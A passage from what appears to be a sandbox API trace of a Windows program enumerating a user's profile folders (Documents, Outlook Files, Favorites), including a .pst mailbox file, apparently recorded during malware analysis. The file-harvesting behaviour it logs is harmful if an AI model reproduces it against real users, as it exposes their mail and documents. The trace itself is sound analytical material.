lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0184.997] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.997] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Videos\\") returned="My Videos\\" [0184.997] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0184.997] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.997] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.997] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.997] PathFindFileNameW (pszPath="") returned="" [0184.997] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Videos\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my videos\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15b2a0b0, ftCreationTime.dwHighDateTime=0x1d89bdf, ftLastAccessTime.dwLowDateTime=0x5545ada0, ftLastAccessTime.dwHighDateTime=0x1d89cf5, ftLastWriteTime.dwLowDateTime=0x5545ada0, ftLastWriteTime.dwHighDateTime=0x1d89cf5, nFileSizeHigh=0x0, nFileSizeLow=0xeaef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z99M8Y1GRoOyuotMz.csv", cAlternateFileName="Z99M8Y~1.CSV")) returned 0xffffffff [0184.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0184.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0184.998] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.998] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0184.998] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0184.998] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.998] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.998] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.998] PathFindFileNameW (pszPath="") returned="" [0184.998] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0185.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb46c0 | out: hHeap=0x620000) returned 1 [0185.001] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.001] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3aa38830, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="franc@gdllo.de.pst", cAlternateFileName="FRANC@~1.PST")) returned 1 [0185.002] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3aa38830, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="franc@gdllo.de.pst", cAlternateFileName="FRANC@~1.PST")) returned 0 [0185.002] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0185.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0185.002] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0185.002] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Links\\") returned="Links\\" [0185.002] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0185.002] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0185.002] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0185.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0185.002] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0185.002] PathFindFileNameW (pszPath="") returned="" [0185.002] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0185.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.003] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.003] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0185.003] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0185.003] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0185.003] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0185.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0185.003] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0185.003] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0185.003] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0185.003] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0185.003] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0185.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.003] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0185.003] PathFindFileNameW (pszPath="") returned="" [0185.004] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0185.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0185.006] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.006] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee50dc0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0185.006] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee4e6b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0185.006] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee55be0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0185.006] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0185.006] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0185.006] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0185.006] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0185.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0185.007] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0185.007] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0185.007] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0185.007] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0185.007] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0185.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0185.007] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0185.007] PathFindFileNameW (pszPath="") returned="" [0185.007] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0185.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb46c0 | out: hHeap=0x620000) returned 1 [0185.009] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.010] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0185.010] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a2a610, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a2a610, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0185.010] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0185.010] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0185.010] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0185.010] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0185.010] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0185.010] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0185.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0185.011] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0185.011] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\") returned="Windows Live\\" [0185.011] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0185.011] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0185.011] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0185.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0185.011] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0185.011] PathFindFileNameW (pszPath="") returned="" [0185.011] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0185.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb46c0 | out: hHeap=0x620000) returned 1 [0185.023] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.023] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0185.023] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0185.023] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0185.023] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0185.023] FindNextFileW (in: hFindFile=0x2cfe100, 